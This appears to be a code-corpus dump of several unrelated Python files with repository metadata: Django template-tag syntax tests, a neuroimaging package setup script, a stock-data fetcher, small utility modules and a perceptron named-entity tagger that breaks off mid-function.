'{% get_next_post[ post[ user[ in_same_blog]]][ as variable_name] %}',
)
def test_get_popular_posts_syntax(self):
self.checkSyntax(
GetPopularPostsTag,
'{% get_popular_posts[ limit[ user[ author[ blog[ category[ tag[ days]]]]]]][ as variable_name] %}',
)
def test_get_post_syntax(self):
self.checkSyntax(
GetPostTag,
'{% get_post post_id[ as variable_name] %}',
)
def test_get_posts_syntax(self):
self.checkSyntax(
GetPostsTag,
'{% get_posts[ limit[ user[ ordering[ author[ blog[ category[ tag[ days]]]]]]]][ as variable_name] %}',
)
def test_get_previous_post_syntax(self):
self.checkSyntax(
GetPreviousPostTag,
'{% get_previous_post[ post[ user[ in_same_blog]]][ as variable_name] %}',
)
def test_get_recent_posts_syntax(self):
self.checkSyntax(
GetRecentPostsTag,
'{% get_recent_posts[ limit[ user[ author[ blog[ category[ tag]]]]]][ as variable_name] %}',
)
def test_get_related_posts_syntax(self):
self.checkSyntax(
GetRelatedPostsTag,
'{% get_related_posts[ post[ limit[ in_same_blog]]][ as variable_name] %}',
)
def test_get_tag_syntax(self):
self.checkSyntax(
GetTagTag,
'{% get_tag tag_slug[ as variable_name] %}',
)
def test_get_tags_syntax(self):
self.checkSyntax(
GetTagsTag,
'{% get_tags *tag_slugs[ as variable_name] %}',
)
def test_last_modification_syntax(self):
self.checkSyntax(
LastModificationTag,
'{% last_modification[ format[ user]] %}',
)
def test_last_publication_syntax(self):
self.checkSyntax(
LastPublicationTag,
'{% last_publication[ format[ user]] %}',
)
def test_next_post_link_syntax(self):
self.checkSyntax(
NextPostLinkTag,
'{% next_post_link[ format[ link[ post[ user[ in_same_blog]]]]] %}',
)
def test_post_authors_syntax(self):
self.checkSyntax(
PostAuthorsTag,
'{% post_authors[ separator[ last_separator[ post]]][ as variable_name] %}',
)
def test_post_categories_syntax(self):
self.checkSyntax(
PostCategoriesTag,
'{% post_categories[ separator[ last_separator[ post]]][ as variable_name] %}',
)
def test_post_tags_syntax(self):
self.checkSyntax(
PostTagsTag,
'{% post_tags[ separator[ last_separator[ post]]][ as variable_name] %}',
)
def test_previous_post_link_syntax(self):
self.checkSyntax(
PreviousPostLinkTag,
'{% previous_post_link[ format[ link[ post[ user[ in_same_blog]]]]] %}',
)
def test_tag_cloud_syntax(self):
self.checkSyntax(
TagCloudTag,
'{% tag_cloud[ limit] %}',
)
| 3,295 | 636 | 23 |
a6745ce4b94e00cc9b78ece31861fa3b258dc893 | 1,740 | py | Python | setup.py | ysuter/DeepNeuro | f6a4a9d0960c696fb73dfcc1093bfd8496b0b6ed | [
"MIT"
] | 113 | 2017-10-15T23:22:02.000Z | 2022-01-22T19:33:39.000Z | setup.py | ysuter/DeepNeuro | f6a4a9d0960c696fb73dfcc1093bfd8496b0b6ed | [
"MIT"
] | 39 | 2017-10-02T18:23:33.000Z | 2021-01-10T03:02:43.000Z | setup.py | ysuter/DeepNeuro | f6a4a9d0960c696fb73dfcc1093bfd8496b0b6ed | [
"MIT"
] | 39 | 2017-10-15T23:22:05.000Z | 2021-08-31T14:02:56.000Z | """DeepNeuro: A deep learning python package for neuroimaging data.
Created by the Quantitative Tumor Imaging Lab at the Martinos Center
(Harvard-MIT Program in Health, Sciences, and Technology / Massachussets General Hospital).
"""
DOCLINES = __doc__.split("\n")
import sys
from setuptools import setup, find_packages
from codecs import open
from os import path
import os
os.environ["MPLCONFIGDIR"] = "."
if sys.version_info[:2] < (3, 5):
raise RuntimeError("Python version 3.5 or greater required.")
setup(
name='deepneuro',
version='0.2.3',
description=DOCLINES[0],
packages=find_packages(),
entry_points= {
"console_scripts": ['segment_gbm = deepneuro.pipelines.Segment_GBM.cli:main',
'skull_stripping = deepneuro.pipelines.Skull_Stripping.cli:main',
'segment_mets = deepneuro.pipelines.Segment_Brain_Mets.cli:main',
'segment_ischemic_stroke = deepneuro.pipelines.Ischemic_Stroke.cli:main'],
},
author='Andrew Beers',
author_email='abeers@mgh.harvard.edu',
url='https://github.com/QTIM-Lab/DeepNeuro', # use the URL to the github repo
download_url='https://github.com/QTIM-Lab/DeepNeuro/tarball/0.2.3',
keywords=['neuroimaging', 'neuroncology', 'neural networks', 'neuroscience', 'neurology', 'deep learning', 'fmri', 'pet', 'mri', 'dce', 'dsc', 'dti', 'machine learning', 'computer vision', 'learning', 'keras', 'theano', 'tensorflow', 'nifti', 'nrrd', 'dicom'],
install_requires=['tables', 'pydicom', 'pynrrd', 'nibabel', 'pyyaml', 'six', 'imageio', 'matplotlib', 'pydot', 'scipy', 'numpy', 'scikit-image', 'imageio', 'tqdm'],
classifiers=[],
)
| 42.439024 | 262 | 0.659195 | """DeepNeuro: A deep learning python package for neuroimaging data.
Created by the Quantitative Tumor Imaging Lab at the Martinos Center
(Harvard-MIT Program in Health, Sciences, and Technology / Massachussets General Hospital).
"""
DOCLINES = __doc__.split("\n")
import sys
from setuptools import setup, find_packages
from codecs import open
from os import path
import os
os.environ["MPLCONFIGDIR"] = "."
if sys.version_info[:2] < (3, 5):
raise RuntimeError("Python version 3.5 or greater required.")
setup(
name='deepneuro',
version='0.2.3',
description=DOCLINES[0],
packages=find_packages(),
entry_points= {
"console_scripts": ['segment_gbm = deepneuro.pipelines.Segment_GBM.cli:main',
'skull_stripping = deepneuro.pipelines.Skull_Stripping.cli:main',
'segment_mets = deepneuro.pipelines.Segment_Brain_Mets.cli:main',
'segment_ischemic_stroke = deepneuro.pipelines.Ischemic_Stroke.cli:main'],
},
author='Andrew Beers',
author_email='abeers@mgh.harvard.edu',
url='https://github.com/QTIM-Lab/DeepNeuro', # use the URL to the github repo
download_url='https://github.com/QTIM-Lab/DeepNeuro/tarball/0.2.3',
keywords=['neuroimaging', 'neuroncology', 'neural networks', 'neuroscience', 'neurology', 'deep learning', 'fmri', 'pet', 'mri', 'dce', 'dsc', 'dti', 'machine learning', 'computer vision', 'learning', 'keras', 'theano', 'tensorflow', 'nifti', 'nrrd', 'dicom'],
install_requires=['tables', 'pydicom', 'pynrrd', 'nibabel', 'pyyaml', 'six', 'imageio', 'matplotlib', 'pydot', 'scipy', 'numpy', 'scikit-image', 'imageio', 'tqdm'],
classifiers=[],
)
| 0 | 0 | 0 |
fb1a8e971ff4bcd9956b2507666420e60420eb72 | 960 | py | Python | coralquant/spider/bs_sz50_stocks.py | dabuc/CoralQuant | 26ba2e0b39a897d8947166796c6a4e9f5ab202fa | [
"MIT"
] | null | null | null | coralquant/spider/bs_sz50_stocks.py | dabuc/CoralQuant | 26ba2e0b39a897d8947166796c6a4e9f5ab202fa | [
"MIT"
] | null | null | null | coralquant/spider/bs_sz50_stocks.py | dabuc/CoralQuant | 26ba2e0b39a897d8947166796c6a4e9f5ab202fa | [
"MIT"
] | null | null | null | from coralquant.models.odl_model import BS_SZ50_Stocks
import baostock as bs
import pandas as pd
from sqlalchemy import String
from coralquant.database import engine
from coralquant.settings import CQ_Config
def get_sz50_stocks():
"""
获取上证50成分股数据
"""
#删除数据
BS_SZ50_Stocks.del_all_data()
# 登陆系统
lg = bs.login()
# 显示登陆返回信息
print('login respond error_code:' + lg.error_code)
print('login respond error_msg:' + lg.error_msg)
# 获取上证50成分股
rs = bs.query_sz50_stocks()
print('query_sz50 error_code:'+rs.error_code)
print('query_sz50 error_msg:'+rs.error_msg)
# 打印结果集
sz50_stocks = []
while (rs.error_code == '0') & rs.next():
# 获取一条记录,将记录合并在一起
sz50_stocks.append(rs.get_row_data())
result = pd.DataFrame(sz50_stocks, columns=rs.fields)
result.to_sql('odl_bs_sz50_stocks', engine, schema=CQ_Config.DB_SCHEMA, if_exists='append', index=False)
# 登出系统
bs.logout() | 25.945946 | 108 | 0.690625 | from coralquant.models.odl_model import BS_SZ50_Stocks
import baostock as bs
import pandas as pd
from sqlalchemy import String
from coralquant.database import engine
from coralquant.settings import CQ_Config
def get_sz50_stocks():
"""
获取上证50成分股数据
"""
#删除数据
BS_SZ50_Stocks.del_all_data()
# 登陆系统
lg = bs.login()
# 显示登陆返回信息
print('login respond error_code:' + lg.error_code)
print('login respond error_msg:' + lg.error_msg)
# 获取上证50成分股
rs = bs.query_sz50_stocks()
print('query_sz50 error_code:'+rs.error_code)
print('query_sz50 error_msg:'+rs.error_msg)
# 打印结果集
sz50_stocks = []
while (rs.error_code == '0') & rs.next():
# 获取一条记录,将记录合并在一起
sz50_stocks.append(rs.get_row_data())
result = pd.DataFrame(sz50_stocks, columns=rs.fields)
result.to_sql('odl_bs_sz50_stocks', engine, schema=CQ_Config.DB_SCHEMA, if_exists='append', index=False)
# 登出系统
bs.logout() | 0 | 0 | 0 |
7eee30bb582ba5ab6b61fd5ba6e6d77feca738b4 | 235 | py | Python | pyswarms/utils/search/__init__.py | goncalogteixeira/pyswarns | c18d61e40f582e54a3a23f0b55c1fff43ec6a5bd | [
"MIT"
] | 959 | 2017-07-23T11:30:24.000Z | 2022-03-30T14:10:55.000Z | pyswarms/utils/search/__init__.py | goncalogteixeira/pyswarns | c18d61e40f582e54a3a23f0b55c1fff43ec6a5bd | [
"MIT"
] | 335 | 2017-07-22T07:22:46.000Z | 2022-03-24T13:09:15.000Z | pyswarms/utils/search/__init__.py | goncalogteixeira/pyswarns | c18d61e40f582e54a3a23f0b55c1fff43ec6a5bd | [
"MIT"
] | 363 | 2017-07-25T01:58:23.000Z | 2022-03-28T17:19:11.000Z | """
The :mod:`pyswarms.utils.search` module implements various techniques in
hyperparameter value optimization.
"""
from .grid_search import GridSearch
from .random_search import RandomSearch
__all__ = ["GridSearch", "RandomSearch"]
| 23.5 | 72 | 0.791489 | """
The :mod:`pyswarms.utils.search` module implements various techniques in
hyperparameter value optimization.
"""
from .grid_search import GridSearch
from .random_search import RandomSearch
__all__ = ["GridSearch", "RandomSearch"]
| 0 | 0 | 0 |
d2739cc17fbb8439caf847f29094b14cd0a43ae8 | 3,203 | py | Python | analysis_data/AnalysisResult.py | solmannn/alu | 1e31b8a39a4718f32b4a8d3f5614553744fd2aad | [
"MIT"
] | null | null | null | analysis_data/AnalysisResult.py | solmannn/alu | 1e31b8a39a4718f32b4a8d3f5614553744fd2aad | [
"MIT"
] | null | null | null | analysis_data/AnalysisResult.py | solmannn/alu | 1e31b8a39a4718f32b4a8d3f5614553744fd2aad | [
"MIT"
] | null | null | null | # -------------------------------------------------------------------------------
# Copyright 2018-2020, Christian Pilato <christian.pilato@polimi.it>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------------
| 61.596154 | 291 | 0.55167 | # -------------------------------------------------------------------------------
# Copyright 2018-2020, Christian Pilato <christian.pilato@polimi.it>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------------
class AnalysisBits():
def __init__(self, name):
self.module = name
self.num_constants = 0
self.num_branches = 0
self.num_operations = 0
self.bits_constants = 0
self.bits_branches = 0
self.bits_operations = 0
class AnalysisResult:
def __init__(self):
self.top_output = None
self.modules = {}
self.list_files = []
def write_analysis(self, cfg):
print("------------------------------------------------------------------------------------")
print("| Original module = \"" + self.top_output.module_name + "\"")
print("| Output module = \"" + self.top_output.name + "\"")
print("------------------------------------------------------------------------------------")
spaces = 0
spaces_bits = 0
for n in self.modules:
spaces = max(spaces, len(str(self.modules[n].num_constants)), len(str(self.modules[n].num_branches)), len(str(self.modules[n].num_operations)))
spaces_bits = max(spaces_bits, len(str(self.modules[n].bits_constants)), len(str(self.modules[n].bits_branches)), len(str(self.modules[n].bits_operations)))
for n in self.modules:
print("- Module = " + n)
print("|- Number of bits for constants = " + ' ' * (spaces - len(str(self.modules[n].num_constants))) + str(self.modules[n].num_constants) + " CONSTANTS / " + ' ' * (spaces_bits - len(str(self.modules[n].bits_constants))) + str(self.modules[n].bits_constants) + " BITS")
print("|- Number of bits for branches = " + ' ' * (spaces - len(str(self.modules[n].num_branches))) + str(self.modules[n].num_branches) + " BRANCHES / " + ' ' * (spaces_bits - len(str(self.modules[n].bits_branches))) + str(self.modules[n].bits_branches) + " BITS")
print("|- Number of bits for operations = " + ' ' * (spaces - len(str(self.modules[n].num_operations))) + str(self.modules[n].num_operations) + " OPERATIONS / " + ' ' * (spaces_bits - len(str(self.modules[n].bits_operations))) + str(self.modules[n].bits_operations) + " BITS")
print("|- Total number of bits (module) = " + str(self.modules[n].bits_constants + self.modules[n].bits_branches + self.modules[n].bits_operations))
print("------------------------------------------------------------------------------------")
| 2,299 | 0 | 125 |
0f1c48a7f94fc42da2ea79d6bd12b1264ea44199 | 313 | py | Python | labs/04_conv_nets_2/solutions/geom_avg.py | souillade/Deep | 3d79384638220376deb7c4c656cfb9cc497998ad | [
"MIT"
] | 1 | 2017-11-30T17:25:08.000Z | 2017-11-30T17:25:08.000Z | labs/04_conv_nets_2/solutions/geom_avg.py | souillade/Deep | 3d79384638220376deb7c4c656cfb9cc497998ad | [
"MIT"
] | null | null | null | labs/04_conv_nets_2/solutions/geom_avg.py | souillade/Deep | 3d79384638220376deb7c4c656cfb9cc497998ad | [
"MIT"
] | null | null | null | heatmap_1_r = imresize(heatmap_1, (50,80)).astype("float32")
heatmap_2_r = imresize(heatmap_2, (50,80)).astype("float32")
heatmap_3_r = imresize(heatmap_3, (50,80)).astype("float32")
heatmap_geom_avg = np.power(heatmap_1_r * heatmap_2_r * heatmap_3_r, 0.333)
display_img_and_heatmap("dog.jpg", heatmap_geom_avg)
| 44.714286 | 75 | 0.766773 | heatmap_1_r = imresize(heatmap_1, (50,80)).astype("float32")
heatmap_2_r = imresize(heatmap_2, (50,80)).astype("float32")
heatmap_3_r = imresize(heatmap_3, (50,80)).astype("float32")
heatmap_geom_avg = np.power(heatmap_1_r * heatmap_2_r * heatmap_3_r, 0.333)
display_img_and_heatmap("dog.jpg", heatmap_geom_avg)
| 0 | 0 | 0 |
fd81f46f8c005602f66b88f3c0b86953d5e2ec77 | 33,356 | py | Python | named-entity-recognizer.py | YNedderhoff/sentiment-classifier | 13d28217f81c21562e5b79f0f85309a968ee534a | [
"MIT"
] | 1 | 2017-06-26T15:43:23.000Z | 2017-06-26T15:43:23.000Z | named-entity-recognizer.py | YNedderhoff/sentiment-classifier | 13d28217f81c21562e5b79f0f85309a968ee534a | [
"MIT"
] | null | null | null | named-entity-recognizer.py | YNedderhoff/sentiment-classifier | 13d28217f81c21562e5b79f0f85309a968ee534a | [
"MIT"
] | null | null | null | import codecs
import time
import cPickle
import gzip
import random
import os
import math
import modules.token as tk
import modules.perceptron as perceptron
import modules.lmi as lmi
from modules.evaluation import evaluate
from modules.affixes import find_affixes
# save the model (weight vectors) to a file:
# load the model (weight vectors) from a file:
# train the classifiers using the perceptron algorithm:
# apply the classifiers to test data:
# build mapping of features to vector dimensions (key=feature, value=dimension index):
if __name__ == '__main__':
t0 = time.time()
import argparse
argpar = argparse.ArgumentParser(description='')
mode = argpar.add_mutually_exclusive_group(required=True)
mode.add_argument('-train', dest='train', action='store_true', help='run in training mode')
mode.add_argument('-test', dest='test', action='store_true', help='run in test mode')
mode.add_argument('-ev', dest='evaluate', action='store_true', help='run in evaluation mode')
mode.add_argument('-tag', dest='tag', action='store_true', help='run in tagging mode')
argpar.add_argument('-i', '--infile', dest='in_file', help='in file', required=True)
argpar.add_argument('-e', '--epochs', dest='epochs', help='epochs', default='1')
argpar.add_argument('-m', '--model', dest='model', help='model', default='model')
argpar.add_argument('-o', '--output', dest='output_file', help='output file', default='output.txt')
argpar.add_argument('-t1', '--topxform', dest='top_x_form', help='top x form', default=None)
argpar.add_argument('-t2', '--topxwordlen', dest='top_x_word_len', help='top x word len', default=None)
argpar.add_argument('-t3', '--topxposition', dest='top_x_position', help='top x position', default=None)
argpar.add_argument('-t4', '--topxprefix', dest='top_x_prefix', help='top x prefix', default=None)
argpar.add_argument('-t5', '--topxsuffix', dest='top_x_suffix', help='top x suffix', default=None)
argpar.add_argument('-t6', '--topxlettercombs', dest='top_x_lettercombs', help='top x letter combs', default=None)
argpar.add_argument('-decrease-alpha', dest='decrease_alpha', action='store_true', help='decrease alpha',
default=False)
argpar.add_argument('-shuffle-sentences', dest='shuffle_sentences', action='store_true', help='shuffle sentences',
default=False)
argpar.add_argument('-batch-training', dest='batch_training', action='store_true', help='batch training',
default=False)
args = argpar.parse_args()
t = posTagger()
if os.stat(args.in_file).st_size == 0:
print "Input file is empty"
else:
if args.train:
print "Running in training mode\n"
if not args.top_x_form:
print args.top_x_form
top_x = [args.top_x_form, args.top_x_word_len, args.top_x_position, args.top_x_prefix, args.top_x_suffix,
args.top_x_lettercombs]
t.train(args.in_file, args.model, int(args.epochs), top_x, args.decrease_alpha, args.shuffle_sentences,
args.batch_training)
elif args.test:
print "Running in test mode\n"
t.test(args.in_file, args.model, args.output_file)
elif args.evaluate:
print "Running in evaluation mode\n"
out_stream = open(args.output_file, 'w')
evaluate(args.in_file, out_stream)
out_stream.close()
elif args.tag:
print "Running in tag mode\n"
t.tag(args.in_file, args.model, args.output_file)
t1 = time.time()
print "\n\tDone. Total time: " + str(t1 - t0) + "sec.\n"
| 50.770167 | 130 | 0.505067 | import codecs
import time
import cPickle
import gzip
import random
import os
import math
import modules.token as tk
import modules.perceptron as perceptron
import modules.lmi as lmi
from modules.evaluation import evaluate
from modules.affixes import find_affixes
class posTagger:
def __init__(self):
pass
# save the model (weight vectors) to a file:
def save(self, file_name, model):
stream = gzip.open(file_name, "wb")
cPickle.dump(model, stream)
stream.close()
# load the model (weight vectors) from a file:
def load(self, file_name):
stream = gzip.open(file_name, "rb")
model = cPickle.load(stream)
stream.close()
return model
def legal_prev_tags(self, tag, t_id_1):
if tag.startswith("O"):
if t_id_1 != 0:
return ["OO", "IO"]
else:
return ["XO"]
elif tag.startswith("I"):
if t_id_1 != 0:
return ["OI", "II"]
else:
return ["XI"]
else:
return []
# train the classifiers using the perceptron algorithm:
def train(self, file_in, file_out, max_iterations, top_x, decrease_alpha, shuffle_sentences, batch_training):
print "\tTraining file: " + file_in
print "\tExtracting features"
x0 = time.time()
feat_vec = self.extractFeatures(file_in)
x1 = time.time()
print "\t" + str(len(feat_vec)) + " features extracted"
print "\t\t" + str(x1 - x0) + " sec."
reversed_feat_vec = {}
for feature in feat_vec:
reversed_feat_vec[feat_vec[feature]] = feature
print "\tCreating tokens with feature vectors"
y0 = time.time()
sentences = [] # save all instantiated tokens from training data, with finished feature vectors
tag_set = set([])
# read in sentences from file and generates the corresponding token objects:
for sentence in tk.sentences(codecs.open(file_in, encoding='utf-8')):
temp = []
# create sparse feature vector representation for each token:
for t_id, token in enumerate(sentence):
if t_id == 0: # first token of sentence
if len(sentence) > 1:
token.set_adjacent_tokens(None, sentence[t_id + 1])
token.createFeatureVector(feat_vec, t_id, sentence[t_id],
None, sentence[t_id + 1])
elif len(sentence) == 1:
token.set_adjacent_tokens(None, None)
token.createFeatureVector(feat_vec, t_id, sentence[t_id],
None, None)
elif t_id == len(sentence) - 1: # last token of sentence
token.set_adjacent_tokens(sentence[t_id - 1], None)
token.createFeatureVector(feat_vec, t_id, sentence[t_id],
sentence[t_id - 1], None)
else:
token.set_adjacent_tokens(sentence[t_id - 1], sentence[t_id + 1])
token.createFeatureVector(feat_vec, t_id, sentence[t_id],
sentence[t_id - 1], sentence[t_id + 1])
token.set_sentence_index(t_id - 1, t_id)
temp.append(token)
tag_set.add(token.gold_tag_1 + token.gold_tag_2)
sentences.append(temp)
"""
for token in sentences[0]:
print token.form_1 + "," + token.form_2
for feature in token.sparse_feat_vec:
print reversed_feat_vec[feature]
print "----"
"""
y1 = time.time()
print "\t\t" + str(y1 - y0) + " sec."
print "\tCreating and training classifiers"
z0 = time.time()
classifiers = {}
lmi_calc = lmi.lmi([t for s in sentences for t in s], feat_vec)
lmi_dict = lmi_calc.compute_lmi()
# instantiate a classifier for each pos tag type:
for tag in tag_set:
classifiers[tag] = perceptron.classifier(tag, feat_vec, lmi_dict, top_x)
# train the classifiers:
alpha = 0.1 # smoothes the effect of adjustments
# number of decreases of alpha during training
# works only only exactly if max_iterations is divisible by alpha_decreases
alpha_decreases = 10
for i in range(1, max_iterations + 1):
total = 0
correct = 0
# batch training:
predictions = {}
for tag in classifiers:
predictions[tag] = [x for x in classifiers[tag].weight_vector]
print "\t\tEpoch " + str(i) + ", alpha = " + str(alpha)
path = []
normalization_constant = 10.0 ** 5.0
for ind, s in enumerate(sentences):
# if ind % (len(sentences) / 10) == 0 and not ind == 0:
# print "\t\t\t" + str(ind) + "/" + str(len(sentences))
for t in s:
if t.t_id_1 == -1 and path:
# adjust classifier weights for incorrectly predicted tag and gold tag:
elem = sorted([(z[0], z[1]) for z in path[-1].items()], key=lambda x: x[1][0])[-1]
gold_tag = elem[1][-1].gold_tag_1 + elem[1][-1].gold_tag_2
tok = elem[1][-1]
if elem[0] != gold_tag:
if batch_training:
predictions[gold_tag] = classifiers[gold_tag].adjust_weights(tok.sparse_feat_vec, True,
alpha,
predictions[gold_tag])
predictions[elem[0]] = classifiers[elem[0]].adjust_weights(tok.sparse_feat_vec, False,
alpha, predictions[elem[0]])
else:
classifiers[gold_tag].weight_vector = classifiers[gold_tag].adjust_weights(
tok.sparse_feat_vec, True, alpha, classifiers[gold_tag].weight_vector)
classifiers[elem[0]].weight_vector = classifiers[elem[0]].adjust_weights(
tok.sparse_feat_vec, False, alpha, classifiers[elem[0]].weight_vector)
else:
correct += 1
total += 1
next_elem = elem[1][1]
for ind2 in range(len(path) - 2, -1, -1):
elem = next_elem
gold_tag = path[ind2][elem][-1].gold_tag_1 + path[ind2][elem][-1].gold_tag_2
tok = path[ind2][elem][-1]
if elem != gold_tag:
if batch_training:
predictions[gold_tag] = classifiers[gold_tag].adjust_weights(tok.sparse_feat_vec,
True, alpha,
predictions[gold_tag])
predictions[elem] = classifiers[elem].adjust_weights(tok.sparse_feat_vec, False,
alpha, predictions[elem])
else:
classifiers[gold_tag].weight_vector = classifiers[gold_tag].adjust_weights(
tok.sparse_feat_vec, True, alpha, classifiers[gold_tag].weight_vector)
classifiers[elem].weight_vector = classifiers[elem].adjust_weights(
tok.sparse_feat_vec, False, alpha, classifiers[elem].weight_vector)
else:
correct +=1
total+=1
next_elem = path[ind2][elem][1]
path = [{"XO": (math.log(math.pow(math.e, classifiers["XO"].classify(t.sparse_feat_vec)), math.e), "", t),
"XI": (math.log(math.pow(math.e, classifiers["XI"].classify(t.sparse_feat_vec)), math.e), "", t)}]
elif t.t_id_1 == -1:
path = [{"XO": (math.log(math.pow(math.e, classifiers["XO"].classify(t.sparse_feat_vec)), math.e), "", t),
"XI": (math.log(math.pow(math.e, classifiers["XI"].classify(t.sparse_feat_vec)), math.e), "", t)}]
else:
temp = {}
for tag in [x for x in tag_set if sum(
[True if y in path[-1] else False for y in self.legal_prev_tags(x, t.t_id_1)]) > 0]:
c = math.log(math.pow(math.e, classifiers[tag].classify(t.sparse_feat_vec)), math.e)
max_arg = (0.0, "")
for prev_tag in self.legal_prev_tags(tag, t.t_id_1):
if prev_tag in path[-1]:
if c + path[-1][prev_tag][0] >= max_arg[0] or max_arg[1] == "":
max_arg = (c + path[-1][prev_tag][0], prev_tag, t)
temp[tag] = max_arg
path.append(temp)
# LAST SENTENCE:
# adjust classifier weights for incorrectly predicted tag and gold tag:
elem = sorted([(z[0], z[1]) for z in path[-1].items()], key=lambda x: x[1][0])[-1]
gold_tag = elem[1][-1].gold_tag_1 + elem[1][-1].gold_tag_2
tok = elem[1][-1]
if elem[0] != gold_tag:
if batch_training:
predictions[gold_tag] = classifiers[gold_tag].adjust_weights(tok.sparse_feat_vec, True, alpha,
predictions[gold_tag])
predictions[elem[0]] = classifiers[elem[0]].adjust_weights(tok.sparse_feat_vec, False, alpha,
predictions[elem[0]])
else:
classifiers[gold_tag].weight_vector = classifiers[gold_tag].adjust_weights(tok.sparse_feat_vec,
True, alpha, classifiers[
gold_tag].weight_vector)
classifiers[elem[0]].weight_vector = classifiers[elem[0]].adjust_weights(tok.sparse_feat_vec, False,
alpha, classifiers[
elem[0]].weight_vector)
else:
correct += 1
total += 1
next_elem = elem[1][1]
for ind2 in range(len(path) - 2, -1, -1):
elem = next_elem
gold_tag = path[ind2][elem][-1].gold_tag_1 + path[ind2][elem][-1].gold_tag_2
tok = path[ind2][elem][-1]
if elem != gold_tag:
if batch_training:
predictions[gold_tag] = classifiers[gold_tag].adjust_weights(tok.sparse_feat_vec, True, alpha,
predictions[gold_tag])
predictions[elem] = classifiers[elem].adjust_weights(tok.sparse_feat_vec, False, alpha,
predictions[elem])
else:
classifiers[gold_tag].weight_vector = classifiers[gold_tag].adjust_weights(tok.sparse_feat_vec,
True, alpha,
classifiers[
gold_tag].weight_vector)
classifiers[elem].weight_vector = classifiers[elem].adjust_weights(tok.sparse_feat_vec, False,
alpha, classifiers[
elem].weight_vector)
else:
correct += 1
total += 1
next_elem = path[ind2][elem][1]
# apply batch results to weight vectors:
if batch_training:
for tag in classifiers:
classifiers[tag].weight_vector = [x for x in predictions[tag]]
# decrease alpha
if decrease_alpha:
if i % int(round(max_iterations ** 1.0 / float(alpha_decreases))) == 0:
# int(round(max_iterations ** 1/alpha_decreases)) is the number x, for which
# i % x == 0 is True exactly alpha_decreases times
alpha /= 2
# shuffle tokens
if shuffle_sentences:
random.shuffle(sentences)
print "Correct: " + str(correct)
print "Total: " + str(total)
for tag in classifiers:
classifiers[tag].multiply_with_binary()
# after training is completed, save classifier vectors (model) to file:
self.save(file_out, [feat_vec, classifiers])
z1 = time.time()
print "\t\t" + str(z1 - z0) + " sec."
# apply the classifiers to test data:
def test(self, file_in, mod, file_out):
# load classifier vectors (model) and feature vector from file:
print "\tLoading the model and the features"
x0 = time.time()
model_list = self.load(mod)
feat_vec = model_list[0]
classifiers = model_list[1]
x1 = time.time()
print "\t" + str(len(feat_vec)) + " features loaded"
print "\t\t" + str(x1 - x0) + " sec."
print "\tTest file: " + file_in
print "\tCreating tokens with feature vectors"
y0 = time.time()
sentences = [] # save all instantiated tokens from training data, with finished feature vectors
tag_set = set() # gather all POS types
empty_feat_vec_count = 0
# read in sentences from file and generates the corresponding token objects:
for sentence in tk.sentences(codecs.open(file_in, encoding='utf-8')):
temp = []
# create sparse feature vector representation for each token:
for t_id, token in enumerate(sentence):
if t_id == 0: # first token of sentence
try:
token.createFeatureVector(feat_vec, t_id, sentence[t_id],
None, sentence[t_id + 1])
except IndexError: # happens if sentence length is 1
token.createFeatureVector(feat_vec, t_id, sentence[t_id],
None, None)
elif t_id == len(sentence) - 1: # last token of sentence
token.createFeatureVector(feat_vec, t_id, sentence[t_id],
sentence[t_id - 1], None)
else:
token.createFeatureVector(feat_vec, t_id, sentence[t_id],
sentence[t_id - 1], sentence[t_id + 1])
token.set_sentence_index(t_id - 1, t_id)
temp.append(token)
tag_set.add(token.gold_tag_1 + token.gold_tag_2)
if len(token.sparse_feat_vec) == 0:
empty_feat_vec_count += 1
sentences.append(temp)
print "\t\t" + str(empty_feat_vec_count) + " tokens have no features of the feature set"
y1 = time.time()
print "\t\t" + str(y1 - y0) + " sec."
print "\tClassifying tokens"
z0 = time.time()
output = open(file_out, "w") # temporarily save classification to file for evaluation
path = []
normalization_constant = 10.0 ** 5.0
for ind, s in enumerate(sentences):
# if ind % (len(sentences) / 10) == 0 and not ind == 0:
# print "\t\t\t" + str(ind) + "/" + str(len(sentences))
for t in s:
if t.t_id_1 == -1 and path:
sequence = []
# adjust classifier weights for incorrectly predicted tag and gold tag:
elem = sorted([(z[0], z[1]) for z in path[-1].items()], key=lambda x: x[1][0])[-1]
gold_tag = elem[1][-1].gold_tag_1 + elem[1][-1].gold_tag_2
tok = elem[1][-1]
sequence.append((tok, gold_tag, elem[0]))
next_elem = elem[1][1]
for ind2 in range(len(path) - 2, -1, -1):
elem = next_elem
gold_tag = path[ind2][elem][-1].gold_tag_1 + path[ind2][elem][-1].gold_tag_2
tok = path[ind2][elem][-1]
sequence.append((tok, gold_tag, elem))
next_elem = path[ind2][elem][1]
for x in range(len(sequence) - 1, -1, -1):
# sequence[x][0].predicted_tag_2 = sequence[x][2][1]
print >> output, sequence[x][0].original_form_2.encode("utf-8") + "\t" + sequence[x][
0].gold_tag_2.encode("utf-8") + \
"\t" + sequence[x][2][1].encode("utf-8")
print >> output, ""
path = [{"XO": (math.log(math.pow(math.e, classifiers["XO"].classify(t.sparse_feat_vec)), math.e), "", t),
"XI": (math.log(math.pow(math.e, classifiers["XI"].classify(t.sparse_feat_vec)), math.e), "", t)}]
elif t.t_id_1 == -1:
path = [{"XO": (math.log(math.pow(math.e, classifiers["XO"].classify(t.sparse_feat_vec)), math.e), "", t),
"XI": (math.log(math.pow(math.e, classifiers["XI"].classify(t.sparse_feat_vec)), math.e), "", t)}]
else:
temp = {}
for tag in [x for x in tag_set if sum(
[True if y in path[-1] else False for y in self.legal_prev_tags(x, t.t_id_1)]) > 0]:
c = math.log(math.pow(math.e, classifiers[tag].classify(t.sparse_feat_vec)), math.e)
max_arg = (0.0, "")
for prev_tag in self.legal_prev_tags(tag, t.t_id_1):
if prev_tag in path[-1]:
if c + path[-1][prev_tag][0] >= max_arg[0] or max_arg[1] == "":
